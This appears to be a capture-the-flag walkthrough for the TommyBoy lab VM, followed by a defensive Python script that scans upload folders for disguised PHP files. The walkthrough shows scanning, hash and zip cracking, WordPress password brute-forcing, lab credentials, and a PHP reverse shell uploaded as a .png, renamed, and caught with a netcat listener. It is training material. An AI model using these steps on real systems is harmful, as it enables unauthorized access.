Introduction
Hi there. In this post you will learn how to solve the TommyBoy CTF challenge. There are 5 flags and we are going to capture each one.
To download TommyBoy, [Click here]
If you have any doubts, use the Discord server.
Discord: https://discord.gg/rmW5eWsjhR
Twitter: https://twitter.com/HacklikeHacker
Aim
To capture the 5 hidden flags.
TommyBoy Hacking Phases
- Finding IP
- Nmap scan
- Nikto Scan
- 1st Flag Capture
- View page source
- prehistoricforest
- Exif tool
- 2nd Flag capture
- Entering spanky password to blog post
- Nmap check open ports
- Access the target using FTP
- 3rd Flag capture
- Capturing 4th Flag
- Cracking zip file using john
- Unzip file
- Wpscan to enumerate wordpress
- Login to WordPress
- SSH connecting
- Restoring website
- Capture the last flag
Finding IP
To find the target IP, just run arp-scan -l
![](http://techyrick.com/wp-content/uploads/2022/02/tommy-boy-ip-1024x314.webp)
Nmap scan
Just run an aggressive (-A) scan:
nmap -A 192.168.1.108
Found that ports 80, 22 and 8008 are open. Let’s note this down.
![](http://techyrick.com/wp-content/uploads/2022/02/tomy-boy-nmap-1-1024x589.webp)
Nikto Scan
Running a Nikto scan to find any possible vulnerability.
nikto -h http://192.168.1.2
![](http://techyrick.com/wp-content/uploads/2022/02/tommy-boy-nikto.webp)
1st Flag Capture
The 1st flag was inside the /robots.txt file; from the Nikto scan I found that /robots.txt is accessible.
curl http://192.168.1.2/robots.txt
![](http://techyrick.com/wp-content/uploads/2022/02/flag-1-1024x347.webp)
First flag: B34rcl4ws
View page source
To view the page source I simply run curl http://192.168.1.2
![](http://techyrick.com/wp-content/uploads/2022/02/tommy-boy-yt-1024x306.webp)
We can find a YouTube link, so let’s open it.
![](http://techyrick.com/wp-content/uploads/2022/02/2022-02-22-17_48_22-Tommy-Boy-_Hey-Prehistoric-Forest_-YouTube-Brave-1024x775.webp)
prehistoricforest
After watching the video I found that it points to a URL:
http://192.168.1.2/prehistoricforest
![](http://techyrick.com/wp-content/uploads/2022/02/tommy-boy-wp-1024x508.webp)
After clicking on the first post I found there is another URL called /richard. Let’s use /richard instead of /prehistoricforest.
![](http://techyrick.com/wp-content/uploads/2022/02/richard-1024x183.webp)
http://192.168.1.2/richard
![](http://techyrick.com/wp-content/uploads/2022/02/richard-1.webp)
Click on shockedrichard.jpg and download the file to the desktop.
![](http://techyrick.com/wp-content/uploads/2022/02/shockedrichard-1024x659.webp)
Exif tool
Using exiftool to find the hash hidden inside the JPG file.
exiftool shockedrichard.jpg
![](http://techyrick.com/wp-content/uploads/2022/02/tommy-crack.webp)
We can see the hash in the User Comment field. I cracked the hash and the password is spanky.
Hash: ce154b5a8e59c89732bc25d6a2e6b90b
Password: spanky
2nd Flag capture
I found the second flag, which is hiding at the URL below.
![](http://techyrick.com/wp-content/uploads/2022/02/2nd-flag-e.webp)
http://192.168.1.2/thisisthesecondflagyayyou.txt
![](http://techyrick.com/wp-content/uploads/2022/02/2nd-captured.webp)
Second Flag: Z4l1nsky
Entering spanky password to blog post
You may have noticed that one of the posts is password protected. To unlock it, enter the cracked password, spanky.
![](http://techyrick.com/wp-content/uploads/2022/02/2022-02-22-18_19_31-Hack-the-TommyBoy-VM-CTF-Challenge-Hacking-Articles-Brave.webp)
Once you have entered the password the post becomes readable. Take a look at it: there are several hidden hints.
1. There is something about nickburns.
2. There is an FTP service running on a non-standard port. Also, the FTP server goes up and down at a regular interval of 15 minutes.
![](http://techyrick.com/wp-content/uploads/2022/02/3r-flag-password.webp)
Nmap check open ports
nmap -p- -sV 192.168.1.2 --open
We can see that port 65534 is open; let’s access it using FTP.
![](http://techyrick.com/wp-content/uploads/2022/02/tommy-ddddd-1024x354.webp)
Access the target using FTP
ftp 192.168.1.2 65534
cat readme.txt
![](http://techyrick.com/wp-content/uploads/2022/02/66.webp)
![](http://techyrick.com/wp-content/uploads/2022/02/readme-1024x509.webp)
3rd Flag capture
Now we know there is another URL:
http://192.168.1.2:8008/NickIzL33t
Let’s go there; note that it is served on port 8008.
![](http://techyrick.com/wp-content/uploads/2022/02/dummy-test-1.webp)
Now, run the dirb command:
dirb http://192.168.1.2:8008/NickIzL33t/ /usr/share/wordlists/rockyou.txt -a "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25" -X .html
We run dirb to discover the fallon1.html file.
http://192.168.1.108:8008/NickIzL33t/fallon1.html
Go to the above link and we will see this:
![](http://techyrick.com/wp-content/uploads/2022/02/fallon1.txt.webp)
Click on the third flag.
![](http://techyrick.com/wp-content/uploads/2022/02/3rd-flag-done.webp)
3rd Flag: TinyHead
Additionally, download the zip file and explore the hint file.
Capturing 4th Flag
Download the zip file.
![](http://techyrick.com/wp-content/uploads/2022/02/password-3rd-flag.webp)
There is a hint given to crack the zip file.
http://192.168.1.108:8008/NickIzL33t/hint.txt
![](http://techyrick.com/wp-content/uploads/2022/02/hint.txt.webp)
To crack the zip file password, let’s generate a wordlist using crunch.
crunch 13 13 -t bev,%%@@^1995 -o /root/Desktop/dict.txt
![](http://techyrick.com/wp-content/uploads/2022/02/crunch-pass.webp)
Cracking zip file using john
The password is cracked:
Password = bevH00tr$1995
![](http://techyrick.com/wp-content/uploads/2022/02/2022-02-22-16_06_49-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl-1024x154.webp)
Unzip file
unzip t0msp4ssw0rdz.zip
cat passwords.txt
![](http://techyrick.com/wp-content/uploads/2022/02/pass-h-1-1024x537.webp)
Username: bigtommysenior
Password: fatguyinalittlecoat <partial password>
Wpscan to enumerate wordpress
wpscan -u http://192.168.1.2/prehistoricforest/ --wordlist=/usr/share/wordlists/rockyou.txt --username tom
![](http://techyrick.com/wp-content/uploads/2022/02/2022-02-22-16_16_50-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl.webp)
User: tom
Password: tomtom1
Login to WordPress
http://192.168.1.2/prehistoricforest/wp-admin
User: tom
Password: tomtom1
![](http://techyrick.com/wp-content/uploads/2022/02/2022-02-22-16_19_06-Callahan-Employee-Blog-‹-Log-In-Brave.webp)
Once logged in you can see there is one post.
![](http://techyrick.com/wp-content/uploads/2022/02/2022-02-22-16_19_43-Edit-Post-‹-Callahan-Employee-Blog-—-WordPress-Brave-1024x636.webp)
Username: bigtommysenior Password: fatguyinalittlecoat1938!!
SSH connecting
ssh bigtommysenior@192.168.1.2
Username: bigtommysenior Password: fatguyinalittlecoat1938!!
![](http://techyrick.com/wp-content/uploads/2022/02/ssh-access-1024x178.webp)
ls -la
cat el-flag-numero-quatro.txt
![](http://techyrick.com/wp-content/uploads/2022/02/cracked-1024x428.webp)
![](http://techyrick.com/wp-content/uploads/2022/02/2022-02-22-16_23_26-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl-1024x598.webp)
4th Flag: EditButton
Restoring website
To capture the 5th flag we first need to restore the website to its original state.
cp callahanbak.bak /var/www/html/index.html
![](http://techyrick.com/wp-content/uploads/2022/02/2022-02-22-16_24_50-Welcome-to-Callahan-Auto-Brave-1024x398.webp)
Capture the last flag
http://192.168.1.2:8008/NickIzL33t/P4TCH_4D4MS/
Go to the above link and upload the payload from /usr/share/webshells/php.
![](http://techyrick.com/wp-content/uploads/2022/02/2022-02-22-21_05_35-Hack-the-TommyBoy-VM-CTF-Challenge-Hacking-Articles-Brave.webp)
![](http://techyrick.com/wp-content/uploads/2022/02/2022-02-22-21_06_27-Hack-the-TommyBoy-VM-CTF-Challenge-Hacking-Articles-Brave.webp)
http://192.168.1.2:8008/NickIzL33t/P4TCH_4D4MS/upload.php
Coming back to the SSH terminal:
cd /var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/
ls
cd uploads/
ls
mv php-reverse-shell.png php-reverse-shell.php
nc -lvp 1234
Now click on the link below to trigger the shell:
http://192.168.1.108:8008/NickIzL33t/P4TCH_4D4MS/uploads/php-reverse-shell.php
ls -la
cat .5.txt
![](http://techyrick.com/wp-content/uploads/2022/02/2022-02-22-21_10_15-Hack-the-TommyBoy-VM-CTF-Challenge-Hacking-Articles-Brave.webp)
5th Flag: Buttcrack
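The last flag depends on the upload form accepting a PHP file disguised with an image extension and the uploads directory executing it once renamed. As an added defender-side example (not code from the original post or the TommyBoy VM), this script scans an uploads directory for exactly that pattern: image-named files containing PHP tags, files with server-executable extensions, and image files whose magic bytes do not match. The directory path and sample files are constructed for the demo.

```python
# Defensive scan of an upload directory (added example, not from the page):
# flags image-named files that contain PHP, files with server-executable
# extensions, and image files whose magic bytes do not match. Paths hypothetical.
import tempfile
from pathlib import Path

IMAGE_MAGIC = {                      # expected leading bytes per image extension
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
EXEC_EXT = {".php", ".phtml", ".php5", ".phar"}   # extensions the PHP handler runs
PHP_MARKERS = (b"<?php", b"<?=")

def classify_upload(name: str, data: bytes) -> str:
    """Return 'ok', 'exec-ext', 'php-in-image' or 'bad-magic' for one file."""
    ext = Path(name).suffix.lower()
    if ext in EXEC_EXT:
        return "exec-ext"
    if ext in IMAGE_MAGIC:
        if any(m in data for m in PHP_MARKERS):
            return "php-in-image"    # e.g. php-reverse-shell.png before the mv
        if not data.startswith(IMAGE_MAGIC[ext]):
            return "bad-magic"
    return "ok"

def scan_uploads(directory: str) -> dict:
    """Return {relative_path: verdict} for every suspicious file under directory."""
    base = Path(directory)
    findings = {}
    for path in base.rglob("*"):
        if path.is_file():
            verdict = classify_upload(path.name, path.read_bytes()[:4096])
            if verdict != "ok":
                findings[str(path.relative_to(base))] = verdict
    return findings

def demo() -> dict:
    """Constructed sample uploads dir mirroring the scenario on this page."""
    samples = {
        "logo.png": IMAGE_MAGIC[".png"] + b"\x00" * 32,            # genuine image
        "php-reverse-shell.png": b"<?php /* renamed shell */ ?>",  # before the mv
        "php-reverse-shell.php": b"<?php echo 1; ?>",              # after the mv
        "avatar.jpg": b"not really a jpeg",                         # wrong magic
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, data in samples.items():
            (Path(tmp) / name).write_bytes(data)
        return scan_uploads(tmp)
```

Run demo() to see the three suspicious samples flagged, or point scan_uploads() at a real uploads directory from cron to catch this kind of upload before it is executed.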